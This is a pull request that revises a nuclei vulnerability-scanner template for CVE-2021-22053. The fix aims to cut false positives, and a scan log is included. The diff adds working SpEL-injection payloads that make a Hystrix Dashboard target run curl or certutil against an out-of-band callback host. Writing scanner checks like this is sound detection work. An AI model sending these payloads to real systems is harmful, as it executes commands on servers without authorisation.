### PR TITLE
Fix CVE-2021-22053.yaml false-positive

### DIFF
--- a/http/cves/2021/CVE-2021-22053.yaml
+++ b/http/cves/2021/CVE-2021-22053.yaml
@@ -26,15 +26,17 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("nslookup {{interactsh-url}}")}__::.x/'
+      - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("curl http://{{interactsh-url}}")}__::.x/'
+      - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("certutil -urlcache -split -f http://{{interactsh-url}}")}__::.x/'
 
     matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol
         words:
-          - "dns"
+          - "http"
 
-      - type: status
-        status:
-          - 500
+      - type: regex
+        part: interactsh_request
+        regex:
+          - 'curl|CertUtil'


### PR DESCRIPTION
````
[high] [CVE-2021-22053] | [https://x.com


nuclei -u https://x.com -id CVE-2021-22053

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.8

                projectdiscovery.io

[INF] Current nuclei version: v2.9.8 (outdated)
[INF] Current nuclei-templates version: v9.5.8 (latest)
[INF] New templates added in latest release: 113
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
[INF] No results found. Better luck next time!
````